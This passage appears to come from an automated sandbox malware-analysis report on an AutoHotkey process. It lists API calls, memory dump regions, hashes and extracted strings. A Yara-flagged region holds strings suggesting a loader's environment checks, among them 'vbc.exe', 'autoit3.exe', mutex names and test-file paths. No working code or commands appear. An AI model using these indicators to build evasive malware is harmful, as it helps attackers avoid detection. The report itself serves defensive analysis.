                                      • LoadResource.KERNEL32(00400000,00000000), ref: 00481F4F
                                      • LockResource.KERNEL32(00000000), ref: 00481F5E
                                      • GetSystemMetrics.USER32(0000000B), ref: 00481F86
                                      • FindResourceW.KERNEL32(00400000,?,00000003), ref: 00481FE6
                                      • LoadResource.KERNEL32(00400000,00000000), ref: 00481FF4
                                      • LockResource.KERNEL32(00000000), ref: 00481FFF
                                      • SizeofResource.KERNEL32(00400000,00000000,00000001,00030000,00000000,00000000,00000000), ref: 0048201A
                                      • CreateIconFromResourceEx.USER32(00000000,00000000), ref: 00482022
                                      • FreeLibrary.KERNEL32(00400000), ref: 0048204D
                                      • ExtractIconW.SHELL32(00000000,?,?), ref: 00482062
                                      • ExtractIconW.SHELL32(00000000,?,-00000001), ref: 0048207F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Resource$IconLoad$ExtractFindLibraryLock$CreateEnumFreeFromMetricsNamesSizeofSystem
                                      • String ID:
                                      • API String ID: 2349713634-0
                                      • Opcode ID: 71fcffbb989d2cc579252a8f0588b47a8fde31afda6c5b6f58fbc39483ebfcdc
                                      • Instruction ID: cf0750a6d69fb2dd84317325baf1e51a53ca3267621c331d5fd8fddb3d20f19d
                                      • Opcode Fuzzy Hash: 71fcffbb989d2cc579252a8f0588b47a8fde31afda6c5b6f58fbc39483ebfcdc
                                      • Instruction Fuzzy Hash: D8511871605310ABD3206F689D44B7FBB9CEB45751F450E2BFE46D62A0D378C801C769
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsnicmp$FreeLibrary__wcstoui64_memset
                                      • String ID: $CDecl$DllCall$Int$This DllCall requires a prior VarSetCapacity.
                                      • API String ID: 886327013-3585077685
                                      • Opcode ID: f7f1b444cf1eeba4568a0b5e1ca36cf6d060be7ccff34da2824006bd5bfca268
                                      • Instruction ID: ad3ab744a547d557392350973ade422c674137b3fe615dc0840b2f4eea0dbc38
                                      • Opcode Fuzzy Hash: f7f1b444cf1eeba4568a0b5e1ca36cf6d060be7ccff34da2824006bd5bfca268
                                      • Instruction Fuzzy Hash: 2852F370A002059FCB14DF58C881BAAB7B0FF45306F14856FED15AB3A2D779AC49CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 04846850
                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0484685D
                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 04846863
                                      • lstrlen.KERNEL32(00000000), ref: 0484688E
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 048468E3
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 048468F3
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 0484691F
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 0484692F
                                      • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04846959
                                      • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 04846969
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                      • String ID:
                                      • API String ID: 1599918012-0
                                      • Opcode ID: 7dade5298152fc593941fe503b6de554de437489973ea8f3d33dd2465c2d663e
                                      • Instruction ID: 84642a106dd61f17bc29ce3db29d73fef198437f26b13e2e16eeeac53a4fb06c
                                      • Opcode Fuzzy Hash: 7dade5298152fc593941fe503b6de554de437489973ea8f3d33dd2465c2d663e
                                      • Instruction Fuzzy Hash: 5A3173B1F0420D7EEF15DAE8C888FEE77BD9B98304F4046A1A545E2144E7F8AA858B51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _wcschr.LIBCMT ref: 00480E8A
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,004DA728), ref: 00480EB2
                                      • FindClose.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,004DA728), ref: 00480ECA
                                      • _wcschr.LIBCMT ref: 00480F1D
                                      • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,004DA728), ref: 00480F42
                                      • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004DA728), ref: 00480F52
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Find$CloseFileFirst_wcschr
                                      • String ID:
                                      • API String ID: 1717823228-0
                                      • Opcode ID: 797df0c256d5725ca41af4faac879a5c98edde5b889bfbd71742acaf223e7456
                                      • Instruction ID: ce61147d11e211d9d93b7a0dd572c10af8625b35c229563d86450140d323540b
                                      • Opcode Fuzzy Hash: 797df0c256d5725ca41af4faac879a5c98edde5b889bfbd71742acaf223e7456
                                      • Instruction Fuzzy Hash: 90512B729103019BC720AB50CC85EBF77A8EF85315F068D2AED4597281F778E90CC799
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404330), ref: 0041EF8A
                                        • Part of subcall function 0047D030: _malloc.LIBCMT ref: 0047D04D
                                      • SetCurrentDirectoryW.KERNEL32(02C40078,004DA728,00000068,00000000,00000000,00000000,004DA728,?,004B6410,00000000,00000000,?,?,?,?,00404330), ref: 0041F19A
                                      • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,004AF9A8,000000FF,00000000,00000001,ErrorLevel,00000000,00000003,02C40248,00000000,00000000,00000000,004DA728,00000068,00000000), ref: 0041F257
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: FileTime$AttributesCurrentDirectorySystem_malloc
                                      • String ID: ErrorLevel$Script file not found:%s
                                      • API String ID: 2559509361-1401792684
                                      • Opcode ID: fd07aa19839ded81b48e4f55a6f5c531e72e7f26b61a6e09514ac9f759156bf5
                                      • Instruction ID: f61fc0c5e7512b7064b2c4a0a2e24b8162e34c72f8404382babc579a4a6b0bdd
                                      • Opcode Fuzzy Hash: fd07aa19839ded81b48e4f55a6f5c531e72e7f26b61a6e09514ac9f759156bf5
                                      • Instruction Fuzzy Hash: DE91CE316012009FC710EF6AEC85B9677A4EB48328F14857FE904973A1D779DC96CB9E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoSystem
                                      • String ID:
                                      • API String ID: 31276548-0
                                      • Opcode ID: 164958952a65646381214db1b4a055e44a1e221444857ac4ad8b7e5867382ee1
                                      • Instruction ID: 6e71f3fd683d6d893fd659b75804d9e834990793f6b68d16eeadc50ce1179f04
                                      • Opcode Fuzzy Hash: 164958952a65646381214db1b4a055e44a1e221444857ac4ad8b7e5867382ee1
                                      • Instruction Fuzzy Hash: BEA012104085014EC404A75D5C4240B318019C0014FC40720745CD9281E705D56402D7
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00444E01
                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00445593
                                        • Part of subcall function 0041EB40: _wcsncpy.LIBCMT ref: 0041EB94
                                        • Part of subcall function 0041EB40: SetCurrentDirectoryW.KERNEL32(004B0CF8,00000000,004DA6A0,004DA6A0,00000000), ref: 0041EC00
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Window$CurrentDirectoryMessageProcRegister_wcsncpy
                                      • String ID: 9000$AHK_ATTACH_DEBUGGER$TaskbarCreated$localhost
                                      • API String ID: 4277639754-182697789
                                      • Opcode ID: c8cdfe95fa883433c8f5fbbb41619d7f9c8b2ba8b67caa1e0989f1b7f940f9d9
                                      • Instruction ID: 311e400f69146cca57776dcc6bbd09bd6731533809533cfdbb805ac6c7e01d95
                                      • Opcode Fuzzy Hash: c8cdfe95fa883433c8f5fbbb41619d7f9c8b2ba8b67caa1e0989f1b7f940f9d9
                                      • Instruction Fuzzy Hash: 9962D172701604AFEB20DF69EC84A6B77A5EB85311F04492BF946C7392D735EC10CBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • _memset.LIBCMT ref: 0041E102
                                        • Part of subcall function 00481EC0: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,?,?,00000000,FFFFFF61,00000000,00000000,00000000), ref: 00481ED9
                                        • Part of subcall function 00481EC0: FindResourceW.KERNEL32(00400000,00400000,0000000E), ref: 00481F3F
                                        • Part of subcall function 00481EC0: LoadResource.KERNEL32(00400000,00000000), ref: 00481F4F
                                        • Part of subcall function 00481EC0: LockResource.KERNEL32(00000000), ref: 00481F5E
                                        • Part of subcall function 00481EC0: GetSystemMetrics.USER32(0000000B), ref: 00481F86
                                        • Part of subcall function 00481EC0: FindResourceW.KERNEL32(00400000,?,00000003), ref: 00481FE6
                                        • Part of subcall function 00481EC0: LoadResource.KERNEL32(00400000,00000000), ref: 00481FF4
                                        • Part of subcall function 00481EC0: LockResource.KERNEL32(00000000), ref: 00481FFF
                                      • GetSystemMetrics.USER32(00000031), ref: 0041E14C
                                        • Part of subcall function 00481EC0: EnumResourceNamesW.KERNEL32 ref: 00481F26
                                        • Part of subcall function 00481EC0: SizeofResource.KERNEL32(00400000,00000000,00000001,00030000,00000000,00000000,00000000), ref: 0048201A
                                        • Part of subcall function 00481EC0: CreateIconFromResourceEx.USER32(00000000,00000000), ref: 00482022
                                        • Part of subcall function 00481EC0: ExtractIconW.SHELL32(00000000,?,?), ref: 00482062
                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0041E17C
                                      • RegisterClassExW.USER32 ref: 0041E1A1
                                      • RegisterClassExW.USER32(?), ref: 0041E1EA
                                      • GetForegroundWindow.USER32 ref: 0041E1F1
                                      • GetClassNameW.USER32(00000000,?,00000040), ref: 0041E203
                                      • __wcsicoll.LIBCMT ref: 0041E217
                                      • CreateWindowExW.USER32(00000000,AutoHotkey,?,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00400000,00000000), ref: 0041E26E
                                      • GetMenu.USER32(00000000), ref: 0041E29E
                                      • EnableMenuItem.USER32(00000000,0000FF79,00000003), ref: 0041E2AE
                                      • CreateWindowExW.USER32(00000000,edit,00000000,50A00804,00000000,00000000,00000000,00000000,00000000,00000001,00400000,00000000), ref: 0041E2F5
                                      • GetDC.USER32(00000000), ref: 0041E305
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041E33E
                                      • MulDiv.KERNEL32(0000000A,00000000), ref: 0041E347
                                      • CreateFontW.GDI32(00000000), ref: 0041E350
                                      • ReleaseDC.USER32(00030450,00000000), ref: 0041E363
                                      • SendMessageW.USER32(00030450,00000030,7B0A0E4C,00000000), ref: 0041E380
                                      • SendMessageW.USER32(00030450,000000C5,00000000,00000000), ref: 0041E392
                                      • ShowWindow.USER32(0002044A,00000000), ref: 0041E3A2
                                      • ShowWindow.USER32(0002044A,00000000), ref: 0041E3AD
                                      • ShowWindow.USER32(0002044A,00000006), ref: 0041E3BC
                                      • SetWindowLongW.USER32(0002044A,000000EC,00000000), ref: 0041E3C8
                                      • LoadAcceleratorsW.USER32(00400000,000000D4), ref: 0041E3DA
                                        • Part of subcall function 0041E510: _memset.LIBCMT ref: 0041E520
                                        • Part of subcall function 0041E510: _wcsncpy.LIBCMT ref: 0041E592
                                        • Part of subcall function 0041E510: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0041E5A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Resource$Window$Load$Create$ClassIconShow$FindLockMenuMessageMetricsRegisterSendSystem_memset$AcceleratorsCapsCursorDeviceEnableEnumExtractFontForegroundFromItemLibraryLongNameNamesNotifyReleaseShell_Sizeof__wcsicoll_wcsncpy
                                      • String ID: 0$AutoHotkey$AutoHotkey2$Consolas$CreateWindow$Lucida Console$RegClass$Shell_TrayWnd$edit
                                      • API String ID: 2663150501-3882032541
                                      • Opcode ID: 0ffa2671344ac2b411b3940b835af6ef24a72abeec5c2d2f6dd451c22f5dee75
                                      • Instruction ID: 0e34028e40d4e23f5c5e0c8176ff6781b07e660b381e0ad69735c3f8942d17fc
                                      • Opcode Fuzzy Hash: 0ffa2671344ac2b411b3940b835af6ef24a72abeec5c2d2f6dd451c22f5dee75
                                      • Instruction Fuzzy Hash: B981C8B5B44300BBE720AB61DC45FA73BA8EB45704F14052BFA05E72D0D7B8A844CB6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • Sleep.KERNEL32(000007D0,00000000,0489F18F,?,00000000,00000000), ref: 0489EC85
                                      • Sleep.KERNEL32(00000064,00000000,0489F18F,?,00000000,00000000), ref: 0489ECBA
                                      • GetCurrentThreadId.KERNEL32 ref: 0489F03B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep$CurrentThread
                                      • String ID: 6.5.1$AHK$AU3$DLL$Yes$abby$autoit3.exe$c.txt$c:\debugg$c:\temp\just_test.txt$c:\temp\test_ok$c:\tes2\$cc.txt$debug 0 $mutex0$mutex1$script.a3x$test$test.txt$u.txt$uu.txt$vbc.exe
                                      • API String ID: 1849766040-536896633
                                      • Opcode ID: 3bc5122a482c3deacd309c444fe6eead752a92e886d603710d7e9008071071f6
                                      • Instruction ID: 3329acff9ade6336c40520280c85159055d1b2c90b77af72792144adee436825
                                      • Opcode Fuzzy Hash: 3bc5122a482c3deacd309c444fe6eead752a92e886d603710d7e9008071071f6
                                      • Instruction Fuzzy Hash: 6AF13834A005088BFF14EBA8D490A9CB3A5EF4660CF584F91EA14EB755DBB4FD498B12
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$FindResource__wcsnicmp
                                      • String ID: $mM$*#1$/CP$/Debug$/ErrorStdOut$/force$/iLib$/include$/restart$/script$9000$A_Args$localhost
                                      • API String ID: 3944913069-1584552616
                                      • Opcode ID: 8dfb7e424f5f28b303d49cc310f6af046d1e3a3d5f69a19a1a6f354707d8da0b
                                      • Instruction ID: 4ea2c535b0a9603de5d2aa5e19152a5ce38d98647489de704cc40f934b39f973
                                      • Opcode Fuzzy Hash: 8dfb7e424f5f28b303d49cc310f6af046d1e3a3d5f69a19a1a6f354707d8da0b
                                      • Instruction Fuzzy Hash: 73712BB1B442016BD711AB69AC42B6B37949BA1709F14403FFE05A63C2F77DDE0582AF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcstoui64
                                      • String ID: Out of memory.
                                      • API String ID: 3882282163-4087320997
                                      • Opcode ID: e109cf9613345e516351f5e4b6e26f657ca4ddc7ec6fd38ec1da9edf0244ba5f
                                      • Instruction ID: 10bcdced3b1fd273e0f3236f0e5bb612d4932cb3b4d7f7201b7a786520782577
                                      • Opcode Fuzzy Hash: e109cf9613345e516351f5e4b6e26f657ca4ddc7ec6fd38ec1da9edf0244ba5f
                                      • Instruction Fuzzy Hash: 53E166716053005BE7209F698CC1BBB7790AB95324F18062FF9919B3C2DB7DD84687AE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$_free$ClipboardCloseGlobalMessagePeekUnlock_wcschr
                                      • String ID: D$SMHD$v1j
                                      • API String ID: 1021975077-266152296
                                      • Opcode ID: 6fb21f818125d9475a097eff479efa0a17ed8342e2308a683a023ebab6e656d2
                                      • Instruction ID: f7e77dbd848ad812e51f72988eb8a59d72245f57d710ad1e6037afe51a8d010e
                                      • Opcode Fuzzy Hash: 6fb21f818125d9475a097eff479efa0a17ed8342e2308a683a023ebab6e656d2
                                      • Instruction Fuzzy Hash: 4E42D070608341CFD724DF14D890B6BB7E1AB89314F146A2FE8858B3A1D779EC85CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • __wcsicoll.LIBCMT ref: 00431307
                                        • Part of subcall function 00438630: _wcsncpy.LIBCMT ref: 004386E3
                                        • Part of subcall function 00438630: _wcschr.LIBCMT ref: 0043872A
                                        • Part of subcall function 00438630: _memmove.LIBCMT ref: 00438776
                                        • Part of subcall function 00438630: _wcschr.LIBCMT ref: 00438783
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                        • Part of subcall function 0041AFD0: __wcsicoll.LIBCMT ref: 0041B0DC
                                        • Part of subcall function 0041AFD0: __wcsicoll.LIBCMT ref: 0041B0F4
                                        • Part of subcall function 0041CEA0: __fassign.LIBCMT ref: 0041CEB0
                                      • __wcsicoll.LIBCMT ref: 004310A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$CountTick_wcschr$ClipboardCloseGlobalMessagePeekUnlock__fassign_memmove_wcsncpy
                                      • String ID: CSV$Parameter #2 invalid.$Parameter #3 invalid.$Read$v1j
                                      • API String ID: 1197092883-2063208240
                                      • Opcode ID: 67f6c7dea7ce6972e0d480ecda0304d9e2e7464eea458bde37fd68bcb011f90e
                                      • Instruction ID: b3bfa134d8ccc7a34a7196c784ca034fcbc288a249cfb7be489ac4d864bae0da
                                      • Opcode Fuzzy Hash: 67f6c7dea7ce6972e0d480ecda0304d9e2e7464eea458bde37fd68bcb011f90e
                                      • Instruction Fuzzy Hash: 4C229C71608340DFD714CF54D880BABB7E5AB88314F149A2FF989873A1D778E845CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      • GetTickCount.KERNEL32 ref: 00430B94
                                      • __wcsnicmp.LIBCMT ref: 00434808
                                      • _wcschr.LIBCMT ref: 0043483E
                                      • __swprintf.LIBCMT ref: 004348CE
                                        • Part of subcall function 00404070: __wcstoi64.LIBCMT ref: 00404080
                                      • __wcsnicmp.LIBCMT ref: 004348ED
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmp
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$__wcsnicmp$ClipboardCloseGlobalMessagePeekUnlock__swprintf__wcstoi64_wcschr
                                      • String ID: %%%s%s%s$Float$Integer$v1j
                                      • API String ID: 2402484164-2641105242
                                      • Opcode ID: 34fbe2e23b42e3702df13e9bdc27c237454fec4696a458d2f8beee5494b01c50
                                      • Instruction ID: f9064c7bbdae209e6c78806b0421e91406ef30e2b7197535e8a870e46e02f5d5
                                      • Opcode Fuzzy Hash: 34fbe2e23b42e3702df13e9bdc27c237454fec4696a458d2f8beee5494b01c50
                                      • Instruction Fuzzy Hash: 1FA13531A04241CBDB28DB24DC95B6A77A1AB49318F14673FE8598B3E1D77CD880CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      • __wcsicoll.LIBCMT ref: 00434EFF
                                        • Part of subcall function 0047FFB0: _vswprintf_s.LIBCMT ref: 0047FFC9
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00434F33
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmp
